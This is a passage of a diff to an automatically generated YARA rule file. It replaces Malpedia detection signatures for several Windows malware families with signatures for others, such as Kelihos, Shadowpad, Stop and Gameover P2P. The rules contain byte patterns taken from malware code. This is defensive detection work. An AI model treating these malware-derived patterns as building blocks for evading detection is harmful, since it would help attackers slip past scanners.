+		$sequence_8 = { 488b8790000000 49891c24 498d5640 4989442408 488b8790000000 498d4c2440 }
+		$sequence_9 = { 4885c9 7415 488b8308010000 33d2 41b800800000 ff9000010000 4889bbe0000000 }
 
 	condition:
-		7 of them and filesize < 2588672
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Jupiter_Auto : FILE
+rule MALPEDIA_Win_Bs2005_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d73fbb35-6ded-5d84-b301-32a821a6ff22"
+		id = "d7ab1e13-ba2d-5cc6-b498-29127d7b94b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jupiter_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bs2005_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "1e4ba4252b0bc544e9c72fa0e946f1d0b7c34c44b8125a03ca9d26d89c2795b2"
+		logic_hash = "9437688f1e9a849259370cda11e68d8a858bd8cd17b5169c95f49dad03ad5566"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127714,34 +128069,34 @@ rule MALPEDIA_Win_Jupiter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 6802000000 ff35???????? ff35???????? }
-		$sequence_1 = { 66c705????????0101 c605????????01 c605????????01 66c705????????0101 }
-		$sequence_2 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 }
-		$sequence_3 = { 8a4146 884105 8b4144 c1f808 884106 }
-		$sequence_4 = { 884104 8a4146 884105 8b4144 c1f808 884106 }
-		$sequence_5 = { 8a4146 884105 8b4144 c1f808 }
-		$sequence_6 = { 66c705????????0101 c605????????01 c605????????01 c605????????01 }
-		$sequence_7 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 c605????????01 }
-		$sequence_8 = { c1f808 884106 8a4144 884107 }
-		$sequence_9 = { c605????????01 c605????????01 66c705????????0101 c605????????01 }
+		$sequence_0 = { 5f 5e 5b 5d c20400 bf???????? 33db }
+		$sequence_1 = { 8b804c000400 50 898748060000 ff15???????? }
+		$sequence_2 = { 8d59bf 81e6ff000000 83c8ff 80fb19 7708 0fbec1 }
+		$sequence_3 = { ff15???????? 85c0 7420 8b8544fbffff 50 ff15???????? 32c0 }
+		$sequence_4 = { 55 8bec 803d????????00 53 56 57 747b }
+		$sequence_5 = { c3 8bff 55 8bec 8b4508 33c9 3b04cda0304100 }
+		$sequence_6 = { 8bf8 57 8d8e1c010c00 51 83c241 }
+		$sequence_7 = { 81c154010400 8bc1 8d7001 8d4900 }
+		$sequence_8 = { 83c408 85ff 7452 8b7704 85f6 743a 8b06 }
+		$sequence_9 = { ffd3 8b7df0 8b4dfc 83c410 }
 
 	condition:
-		7 of them and filesize < 224112
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Aresloader_Auto : FILE
+rule MALPEDIA_Win_Typehash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "72768534-8c41-5891-8d86-5b5baf0231f5"
+		id = "edf296ed-fbc4-5bd8-b180-ef55e989c944"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aresloader_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.typehash_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "01346a5099a8423ed0407177afbd014d15a423ebfced07e8fa01ead0f1c12c68"
-		score = 60
-		quality = 25
+		logic_hash = "9451e6a97a0b537ea280e22049617c90fd5aa93257a4b129bfda6427a2eb4eeb"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -127753,32 +128108,32 @@ rule MALPEDIA_Win_Aresloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744241c00000000 c744241800000000 c744241410000000 c744241000000000 c744240c00000000 c744240800000000 c744240400000000 }
-		$sequence_1 = { 8b742430 8b7c2438 8b6c243c 85db 7435 }
-		$sequence_2 = { 7831 39d8 7205 c6441eff00 }
-		$sequence_3 = { 8b7c2438 8b6c243c 3d???????? 741d 896c243c 897c2438 89742434 }
-		$sequence_4 = { 8b742434 8b7c2438 8b6c243c 3d???????? }
-		$sequence_5 = { 741d 896c243c 897c2438 89742434 }
-		$sequence_6 = { a1???????? 8b5c2430 8b742434 8b7c2438 8b6c243c 3d???????? }
-		$sequence_7 = { 8b742434 8b7c2438 8b6c243c 3d???????? 741d 896c243c }
-		$sequence_8 = { 897c2408 895c2404 893424 e8???????? 85c0 7831 }
-		$sequence_9 = { 741d 896c243c 897c2438 89742434 895c2430 }
+		$sequence_0 = { 83e11f 8b0485e03d4100 8d04c8 eb05 b8???????? f6400420 740d }
+		$sequence_1 = { c3 8bc8 83e01f c1f905 8b0c8de03d4100 8a44c104 }
+		$sequence_2 = { e8???????? 6a01 8d4c2450 c68424cc00000001 e8???????? bf???????? }
+		$sequence_3 = { 8944240c c744241004000000 7460 8b2d???????? 8b3d???????? }
+		$sequence_4 = { c1f805 c1e603 8d1c85e03d4100 8b0485e03d4100 03c6 8a5004 }
+		$sequence_5 = { 50 51 6813000020 56 c744242000000000 c744242404000000 ffd7 }
+		$sequence_6 = { 03c8 3bc1 7d1e 8d1440 2bc8 8d1495e8294100 832200 }
+		$sequence_7 = { 3bf3 7505 be???????? 8b54242c 8b442430 8bcf 55 }
+		$sequence_8 = { 837d1805 7538 837d1000 7508 8bb6b42b4100 }
+		$sequence_9 = { e8???????? 68???????? 8d45c8 c745c8e4e74000 50 }
 
 	condition:
-		7 of them and filesize < 2657280
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Protonbot_Auto : FILE
+rule MALPEDIA_Win_Kelihos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8cdc823c-c8c1-58ea-8d03-57dbf9ef2cfb"
+		id = "916af3c3-ae46-5939-bcc1-467f81305f04"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.protonbot_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kelihos_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1da2c73b33dd64c5d5bd2696d510d134f1603c96fce2824c4a93e6a826735bf1"
+		logic_hash = "01c4d51fd72ba50cd8794e1b3e4eee55e82df8fc084f2e85675408a95d821aa3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127792,32 +128147,32 @@ rule MALPEDIA_Win_Protonbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc6 8b8c24b4010000 5e 33cc }
-		$sequence_1 = { 8b00 a3???????? 8d4520 0f434520 50 e8???????? 83c404 }
-		$sequence_2 = { 83c404 8b07 ffd0 e8???????? 6a04 57 }
-		$sequence_3 = { 0f434520 50 e8???????? 83c404 50 }
-		$sequence_4 = { 8d85d8feffff 0f4385d8feffff 50 8d85f0feffff }
-		$sequence_5 = { 6804010000 8d85ecfeffff c645fc02 50 6a00 ff15???????? 8d8decfeffff }
-		$sequence_6 = { 899df8fffeff e8???????? 83c410 8bf8 89bdf4fffeff }
-		$sequence_7 = { 8d85bcfeffff 83bdd0feffff10 8d8da4feffff 0f4385bcfeffff }
-		$sequence_8 = { a1???????? 33c4 898424b0010000 56 6a00 8d44240c }
-		$sequence_9 = { 56 8b35???????? ffd6 ffb5c0f7ffff ffd6 }
+		$sequence_0 = { ff7508 e8???????? 59 c3 6a10 68c8b20310 e8???????? }
+		$sequence_1 = { e8???????? 8ac3 e9???????? b301 e9???????? 56 8db710010000 }
+		$sequence_2 = { c645fc01 8db780000000 6a01 8975f0 e8???????? 59 59 }
+		$sequence_3 = { e8???????? 83c40c ff7510 c645fc01 50 8d45bc 50 }
+		$sequence_4 = { e8???????? c645fc03 53 8d4d9c c7851cffffff3c000000 89b530ffffff e8???????? }
+		$sequence_5 = { c645fc06 e8???????? 59 59 56 53 50 }
+		$sequence_6 = { e8???????? eb48 8d7598 e8???????? ffb564ffffff 8dbd58ffffff 8d75a0 }
+		$sequence_7 = { e8???????? 8bf0 53 8d442428 50 8bce e8???????? }
+		$sequence_8 = { e8???????? 8b4508 6a03 e8???????? ff7618 8b4d08 e8???????? }
+		$sequence_9 = { e8???????? ff770c 8d75ec e8???????? ff75f8 8d45ec ff75f4 }
 
 	condition:
-		7 of them and filesize < 1073152
+		7 of them and filesize < 4702208
 }
-rule MALPEDIA_Win_Maoloa_Auto : FILE
+rule MALPEDIA_Win_Rcs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a2b1982-b20a-5388-b0ef-52864066a031"
+		id = "5cb7f68d-21c9-5599-a702-4f54a0b6f0b5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maoloa_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rcs_auto.yar#L1-L180"
 		license_url = "N/A"
-		logic_hash = "db1d30099f88e9731a955a855e8ff6fe8bdddafcf359d763b17d4e94ad2fc492"
+		logic_hash = "bb528f6bd9f82e58eb70b918c0975f8fb2e7c478b0eed2addcdb6f608a2b172e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127831,32 +128186,40 @@ rule MALPEDIA_Win_Maoloa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8be5 5d c3 bf00afffff 8d8dc8fbffff e8???????? }
-		$sequence_1 = { 50 56 6a01 6a00 68???????? ffb598e3ffff ff15???????? }
-		$sequence_2 = { 33c3 d1e9 83f007 8bde 8b9c8310100000 8bc2 335cbdbc }
-		$sequence_3 = { 0f8eddfeffff 8b44244c 8d4c2458 68???????? 03c1 50 ff15???????? }
-		$sequence_4 = { 8b4de8 8b0485d8ed4200 f644082840 7409 803f1a 7504 }
-		$sequence_5 = { 8bd7 8d4d90 e8???????? 8bf0 6a6c 8d4590 }
-		$sequence_6 = { 8d45f0 50 e8???????? 83c404 85c0 7502 8937 }
-		$sequence_7 = { 50 8d8570ffffff 50 e8???????? 83c40c 8d8d70ffffff 33d2 }
-		$sequence_8 = { 8bd7 e8???????? 85c0 0f898e020000 ba01000000 8bce e8???????? }
-		$sequence_9 = { 3bc1 0f47c1 a3???????? c705????????000000c0 c705????????000000c0 c705????????80000088 8d8594e3ffff }
+		$sequence_0 = { ff15???????? 5f 5e 5d 5b 33c0 }
+		$sequence_1 = { 89442456 8944245a 8944245e 89442462 89442466 8944246a }
+		$sequence_2 = { 85ff 0f84d4000000 57 e8???????? }
+		$sequence_3 = { e8???????? 83c430 6aff 68???????? }
+		$sequence_4 = { 40 68???????? 50 e8???????? 83c40c eb0d }
+		$sequence_5 = { 6a01 6a00 6a05 6800000040 }
+		$sequence_6 = { 81f1ff2fe523 85cd f9 33d9 }
+		$sequence_7 = { 83e001 48 83e004 83c004 }
+		$sequence_8 = { 6a6e ff5760 8bb7dc000000 898610120000 5f 5e c9 }
+		$sequence_9 = { 3b5d0c 7506 8b7d08 897dfc 8b7d08 89fe }
+		$sequence_10 = { c78578fffbff06000000 c7857cfffbff00000100 c78588fffbff00028004 8365ec00 8d8518fffbff }
+		$sequence_11 = { 0508070000 50 ff96b8000000 43 83fb0f 72dd }
+		$sequence_12 = { 81f20c055354 66f7c54b45 f5 6681fca14f }
+		$sequence_13 = { 83fb01 741d 83fb02 7418 83fb03 7413 }
+		$sequence_14 = { 740c c785a0f9fbff00e0ffff eb0a c785a0f9fbff80faffff ffb5a0f9fbff }
+		$sequence_15 = { ffb5a0f9fbff 8b86dc000000 8b5020 8b805c020000 }
+		$sequence_16 = { 8b7d08 8b37 81c608020000 56 ff75fc ff5704 894764 }
+		$sequence_17 = { 83fb01 750e 8b463c 8d5640 }
 
 	condition:
-		7 of them and filesize < 586752
+		7 of them and filesize < 11501568
 }
-rule MALPEDIA_Win_Pwnpos_Auto : FILE
+rule MALPEDIA_Win_Shadowpad_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89590cbe-393e-53e8-874f-1579725c5e19"
+		id = "1c39d05c-4c59-5f9b-9da5-72e531a1a600"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pwnpos_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shadowpad_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "99cca90c63c7d894b30f59c47917d71bb5281e2d807f6e3da388b67f1d509c2d"
+		logic_hash = "a48ed110f457b6e73e53b15a8712b4e6c99fbab0e15de593c3c355b2a563bc5f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127870,32 +128233,32 @@ rule MALPEDIA_Win_Pwnpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745f45cb34300 e8???????? cc 8bff 55 8bec 56 }
-		$sequence_1 = { 50 8b4510 51 53 8b5c2428 52 50 }
-		$sequence_2 = { ebab c745e444b24300 817de450b24300 7311 }
-		$sequence_3 = { 8d442414 c7442448ffffffff 50 8935???????? e8???????? c744244801000000 8b16 }
-		$sequence_4 = { 0fb6c0 50 8b420c ffd0 83f8ff 0f85c2000000 834dec04 }
-		$sequence_5 = { 50 27 42 00742742 009c2742008a46 0323 }
-		$sequence_6 = { 53 6a65 56 e8???????? 83c40c 85c0 0f849e000000 }
-		$sequence_7 = { 895df4 f6c203 743c 8bd6 c1fa05 8b1495a0774400 83e61f }
-		$sequence_8 = { c705????????c11a4300 c705????????4d1a4300 c3 8bff }
-		$sequence_9 = { e8???????? 8d4c2408 51 8d4c2410 8bf8 c744240ce0ea4300 }
+		$sequence_0 = { e8???????? 59 8d75dc a3???????? e8???????? 53 ff15???????? }
+		$sequence_1 = { e8???????? 5e c3 8d4648 e8???????? 830eff }
+		$sequence_2 = { 50 6801000080 ffd3 8d442430 50 ff15???????? 393d???????? }
+		$sequence_3 = { 0430 8845f8 8d45f8 50 }
+		$sequence_4 = { 33c0 57 33ff 8945e0 894de4 897dec 894de8 }
+		$sequence_5 = { 803c0700 7403 47 ebba 8b4d08 33c0 }
+		$sequence_6 = { c20400 55 8bec 53 57 ff7508 ff15???????? }
+		$sequence_7 = { 50 e8???????? 85c0 7594 8d45c0 }
+		$sequence_8 = { 50 ffd6 83f820 7e0a 53 8d8590efffff 50 }
+		$sequence_9 = { 0fb639 c1ce08 83cf20 03f7 83c102 81f6a3d9357c 663919 }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Gspy_Auto : FILE
+rule MALPEDIA_Win_Prestige_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5725a0eb-387e-5f55-9c61-97bda1555361"
+		id = "e0029ece-b029-5766-af56-54e290d25cc7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gspy_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.prestige_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "c2942f87aa0e0d3cd7efb2debc57b53c46a950e05b62dce63b5340d2d7cb5666"
+		logic_hash = "bf3e8d9d4daef418b3a3a7f61bd3283d0f9369ffef531d651e87452e24457972"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127909,32 +128272,32 @@ rule MALPEDIA_Win_Gspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff5514 46 833cb700 8d04b7 75d7 f6451001 }
-		$sequence_1 = { 8d4601 85c0 741e 83c004 50 a1???????? 6a08 }
-		$sequence_2 = { ffd7 85c0 7508 53 8d542410 52 }
-		$sequence_3 = { 807eff00 750b 803e00 740a 03c3 3bc3 }
-		$sequence_4 = { 88442424 8b442418 8b08 8d54241c 52 8b9792b04200 52 }
-		$sequence_5 = { 8d542438 52 6813000020 53 c744242404000000 c744244400000000 ff15???????? }
-		$sequence_6 = { 8b44246c 47 57 8d4c247c 8d7c241c c784248000000000100000 e8???????? }
-		$sequence_7 = { 85ed 750f 396b08 7462 833b2c 725d }
-		$sequence_8 = { 51 53 55 56 8bf0 8b4648 57 }
-		$sequence_9 = { ffd5 3d02010000 750d 803d????????00 0f85fbfeffff 5f 5e }
+		$sequence_0 = { 6a00 89bd60ffffff e8???????? 6a10 56 8d8d60ffffff c645fc02 }
+		$sequence_1 = { 8b7dfc 6a00 57 e8???????? eb3a 8bfe c1e702 }
+		$sequence_2 = { 7407 46 89b558ffffff 80bd5fffffff00 742c 8d4da0 3bc8 }
+		$sequence_3 = { 50 6a01 8d4508 0f57c0 50 8d45fc 660f1345f4 }
+		$sequence_4 = { 0f8406feffff 8ac2 0430 8806 894df0 33c9 }
+		$sequence_5 = { eb0b 88855fffffff 6a02 58 8bc8 51 ff7310 }
+		$sequence_6 = { 8b75f4 8b55fc 3bde 7315 8bc2 33d2 6a0a }
+		$sequence_7 = { e8???????? 51 68???????? 8d8de8f5ffff c645fc56 e8???????? 51 }
+		$sequence_8 = { 83e03f 6bc038 8955f0 8b1495480a4b00 8945f8 8a5c0229 80fb02 }
+		$sequence_9 = { e9???????? 8b4d08 8d45f0 50 c745f054334700 c745f40e000000 }
 
 	condition:
-		7 of them and filesize < 421888
+		7 of them and filesize < 1518592
 }
-rule MALPEDIA_Win_Ismdoor_Auto : FILE
+rule MALPEDIA_Win_Dramnudge_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83a6746f-b3b5-5b57-a445-904bcf5ea3d8"
+		id = "16a885b0-9bee-5a69-bfc1-f44df8ee4d9a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ismdoor_auto.yar#L1-L152"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dramnudge_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "b2a8beb2bbf9a7e436997cbc54636f7d3af94cae5a6618f143e6a6f5f28950e2"
+		logic_hash = "1c6ef479d0cf6562ae3d91df027da2da66ff27de574cb4249d01e23b1b7fe9ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127948,37 +128311,32 @@ rule MALPEDIA_Win_Ismdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f8ff 7504 32c0 eb05 c0e804 2401 84c0 }
-		$sequence_1 = { 488b15???????? e8???????? 488b3d???????? 488d5fe0 }
-		$sequence_2 = { 747e 4883f8ff 7606 4883c9ff }
-		$sequence_3 = { 4889450f 48837e1808 7205 488b16 }
-		$sequence_4 = { 8bce 83e11f 41b901000000 41d3e1 448bc6 49c1e805 }
-		$sequence_5 = { 488bfb 488bde 4885f6 75d7 }
-		$sequence_6 = { 7512 488d9550010000 488b4d90 e8???????? eb02 ffcb }
-		$sequence_7 = { 4c8d8d10020000 4c8bc7 488bd0 488d8d70010000 }
-		$sequence_8 = { 837dc000 0f8414010000 83ec18 c745e800000000 }
-		$sequence_9 = { 8d4dd8 c745fc00000000 e8???????? 8d4508 c645fc01 50 }
-		$sequence_10 = { c645fc34 50 ba???????? 8d8dd4feffff e8???????? }
-		$sequence_11 = { 8bf8 8d85f4fdffff 50 56 }
-		$sequence_12 = { c6458300 8b4dc8 85c9 7409 }
-		$sequence_13 = { 8b45ec 8b75cc 3bc6 7557 8b36 }
-		$sequence_14 = { c785a8feffff00000000 c68598feffff00 83bd3cffffff10 720e ffb528ffffff e8???????? }
+		$sequence_0 = { 33c0 894590 8b5590 8955f8 8d4df0 894d8c }
+		$sequence_1 = { 8bcb 895808 89480c 895010 8b400c 33d2 }
+		$sequence_2 = { 59 03c6 50 e8???????? 83c40c 53 e8???????? }
+		$sequence_3 = { 52 51 8b45b0 50 8d45f8 }
+		$sequence_4 = { 66c745c41400 51 e8???????? 59 50 53 }
+		$sequence_5 = { 56 e8???????? 59 8bd8 53 53 8b4508 }
+		$sequence_6 = { 7602 8bf7 8bc7 0bc6 7516 e8???????? 50 }
+		$sequence_7 = { c1e204 83c204 52 e8???????? 59 }
+		$sequence_8 = { 40 750f 6a01 8b13 8b0a 51 }
+		$sequence_9 = { 7409 57 ff5334 59 8bf0 eb09 }
 
 	condition:
-		7 of them and filesize < 1933312
+		7 of them and filesize < 1294336
 }
-rule MALPEDIA_Win_Rawpos_Auto : FILE
+rule MALPEDIA_Win_Gameover_P2P_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f6a04448-ba2c-50f7-b9f8-5b14dc2eb099"
+		id = "f5c0a78b-346b-519f-ad74-638351724851"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rawpos_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gameover_p2p_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "56a2b8fbb4e25a898a4bc87c65b7d85dae5bb8a6be93f75773ea8a26525a9a96"
+		logic_hash = "6bb48450821c79bc0f52b1eda3804ae910335d753ba80db1932c028cecce35a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127992,32 +128350,32 @@ rule MALPEDIA_Win_Rawpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e82d 741d 83e828 7440 83e803 7446 eb4c }
-		$sequence_1 = { e9???????? ff45ec 8b55ec 3b55f8 7ede e9???????? c745ec01000000 }
-		$sequence_2 = { 23c8 33d2 894d0c 8955cc 8955d0 8b45d0 }
-		$sequence_3 = { 8bca 894dcc 8bd1 035514 8955d0 8955ec 668b5608 }
-		$sequence_4 = { 59 8b55e0 8b4d14 2b5508 33c0 8911 eb56 }
-		$sequence_5 = { 83c410 6a00 8d4df4 51 8d856845feff 50 e8???????? }
-		$sequence_6 = { ff550c 83c408 837dfc00 7505 83c8ff eb03 8b45fc }
-		$sequence_7 = { f6833523430004 7405 48 3bd0 76ee }
-		$sequence_8 = { 7507 be0a000000 eb12 83fe01 0f8ce6000000 83fe24 0f8fdd000000 }
-		$sequence_9 = { 8bd0 83e207 8911 8816 }
+		$sequence_0 = { e8???????? 84c0 745f 53 bb00080000 3bf3 57 }
+		$sequence_1 = { 897c2424 896c2414 85c0 740f 8d542414 8bc8 }
+		$sequence_2 = { ff15???????? 8b4e0c 85c9 740f 8b5608 e8???????? 8b7608 }
+		$sequence_3 = { 834c2418ff 6880000000 6a01 53 53 8d442430 }
+		$sequence_4 = { 8d7e18 f60601 0f854efeffff 51 8d4c2430 e8???????? 8b4e50 }
+		$sequence_5 = { 7415 ff770c 8d442418 51 }
+		$sequence_6 = { 7409 8bd0 33c9 e8???????? 32c0 5e c9 }
+		$sequence_7 = { ffd5 83c40c f6c308 7408 668b4734 66894634 33c0 }
+		$sequence_8 = { 5e 5b c9 c20800 85db 7427 }
+		$sequence_9 = { 0f8481000000 57 ff75fc bf04010000 68???????? 53 8d85f0fdffff }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Tiny_Turla_Auto : FILE
+rule MALPEDIA_Win_Stop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cbc30228-0e4c-5d86-b8e7-6b44a66c67bf"
+		id = "de89cbb5-1ad4-59ee-8eda-db1d3b1226e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tiny_turla_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stop_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b2b8f5dd8c24eb98beaa2120ec3707c14594804ade8ee0e436beafc526cfc343"
+		logic_hash = "1680007e54c6e417cda892af6931e2e17f934d49d2fb7326d537897be6e026a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128031,32 +128389,32 @@ rule MALPEDIA_Win_Tiny_Turla_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7521 488d4c2450 44896d7f e8???????? }
-		$sequence_1 = { 48c744242000000000 488bd7 ff15???????? 85c0 7540 8b4c2450 }
-		$sequence_2 = { e8???????? 488bf8 4885c0 0f8403010000 41b80e000000 }
-		$sequence_3 = { 4c8be8 4885c0 0f84d8010000 488b5628 }
-		$sequence_4 = { 4889742458 48897c2430 e8???????? 498907 }
-		$sequence_5 = { 488bcf e8???????? 413bc6 7407 }
-		$sequence_6 = { 66894308 488d5b10 413bfe 72d3 488d5e18 488bcb }
-		$sequence_7 = { 740e ff15???????? 48c74310ffffffff 33c0 e9???????? 4533c9 4c8d442450 }
-		$sequence_8 = { 488bcf e8???????? 8bc8 8bd8 e8???????? 4c8bf0 }
-		$sequence_9 = { 488d5e10 488bcb e8???????? 4c8933 32db e9???????? 488bcf }
+		$sequence_0 = { e8???????? 83c404 8b4b04 b8abaaaa2a 2b0b f7e9 8bcf }
+		$sequence_1 = { ff15???????? 8b35???????? 8b3d???????? 6a01 6a00 6a00 6a00 }
+		$sequence_2 = { ffd7 6a01 6a00 6a00 6a00 8d45e0 50 }
+		$sequence_3 = { 50 ffd6 85c0 75e8 6a0a ff7304 ff15???????? }
+		$sequence_4 = { 83c404 8b4b04 b8abaaaa2a 2b0b }
+		$sequence_5 = { ffd6 85c0 75e2 5f }
+		$sequence_6 = { 83c102 eb84 6a0c 68???????? e8???????? 8b7d08 33c9 }
+		$sequence_7 = { 6a00 6a00 8d45e0 50 ffd6 85c0 741e }
+		$sequence_8 = { 57 6a00 8bd9 6a00 6a12 ff33 ff15???????? }
+		$sequence_9 = { 75e8 6a0a ff7304 ff15???????? 3d02010000 74c4 }
 
 	condition:
-		7 of them and filesize < 51200
+		7 of them and filesize < 6029312
 }
-rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE
+rule MALPEDIA_Win_Nightclub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a0abd06-565e-5d05-9c7f-92841d5839a1"
+		id = "16a1e3cd-d9e1-5de2-a066-97eb2bedde4e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
